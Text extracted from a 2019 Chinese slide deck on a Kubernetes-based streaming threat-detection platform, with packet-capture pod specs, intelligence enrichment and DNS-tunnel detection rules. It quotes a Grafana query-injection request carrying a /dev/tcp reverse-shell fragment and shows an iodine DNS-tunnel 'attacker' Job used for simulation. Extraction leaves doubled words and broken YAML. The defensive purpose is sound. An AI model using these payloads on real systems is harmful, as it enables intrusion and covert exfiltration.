2019年基于kubernetes的流式威胁检测平台.pdf

1、基于kubernetes的流式威胁检测平台目录1.从SIEM到SOAR，安全响应的困境2.使用KUBERNETES快速构建威胁检测平台3.安全检测案例目录SIEM 101从SIEM到SOAR，安全响应的困境多数据源整合从SIEM到SOAR，安全响应的困境告警过载低质从SIEM到SOAR，安全响应的困境/grafana/api/datasources/query?db=test&q=;SELECT mean(A1)FROM”statistic WHERE(exchange=1)AND time=1564448400000ms and time&/dev/tcp/1.1.1.1/2333 0&1s

2、tdin:truetty:trueContainer共享Pod网络kubernetes开启tty使用KUBERNETES快速构建威胁检测平台-name:tcpdumpimage:- eth0-w/pcap/$(date+%Y%m%d)-$(hostname).pcapvolumeMounts:-name:pcap-storagemountPath:/pcap/tcpdump对攻击流量包做快照-name:zeekimage:- policy限定网络，模拟场景化操作攻防平台并非单一的漏洞平台，Maneo呈现了一整套攻击过程和受害主机的活动使用KUBERNETES快速构建威胁检测平台apiVersi

3、on:batch/v1kind:Jobmetadata:name:case-tunnel-dns-iodine-direct-attackerspec:containers:-name:iodineimage:- 2333 2&1 /dev/nullstdin:truetty:trueports:-containerPort:2333protocol:TCPvolumes:-name:dev-net-tunhostPath:path:/dev/nettype:Directory发起攻击使用KUBERNETES快速构建威胁检测平台安全检测CASE1：实时情报查询Event流流情报流情报流clas

4、s EnrichmentFunctionextends CoProcessFunctionEvent,Ioc,EventEnrich Event丰富化流丰富化流情报中心情报中心厂商情报厂商情报API定期更新定期更新Filter(black:true)-Map-Sink:out情报统计情报统计访问访问TopX随机子域名随机子域名 Filter(未命中:true)-Map-Sink:Kafka情报：情报：厂商厂商A判定：黑判定：黑厂商厂商B判定：灰判定：灰家族：家族：Dorkbot标签：标签：C&C、Malware情报：情报：厂商厂商A判定：黑判定：黑厂商厂商B判定：灰判定：灰家族：家族：Dork

5、bot标签：标签：C&C、Malware情报：情报：厂商厂商A判定：黑判定：黑厂商厂商B判定：灰判定：灰家族：家族：Dorkbot标签：标签：C&C、MalwareFilter(内部资产)安全检测CASE2：DNS TUNNEL0102031.子域名数目2.TXT过量3.CNAME过量4.GEO统计5.NXDomain分布6.域名长度异常规则|SELECT ip,domain,LASTVALUE(Hour_count)as lastv,AVG(Hour_count)as avgv,STDDEV_SAMP(Hour_count)as stdsv,|FROM dailyCount|GROUP BY operator_no,fund_account|HAVING lastv avgv+$threshold1*stdsv AND ABS(stdsv-stdsvLastHour)+$threshold2基线和趋势1.子域名随机度2.根域名popular度3.日查询数4.日查询机器数5.子域名个数6.响应时间7.最大分钟级子域名个数8.最大5分钟级子域名个数9.最大分钟级查询数10.最大子分钟级查询度11.算法模型特征THANKS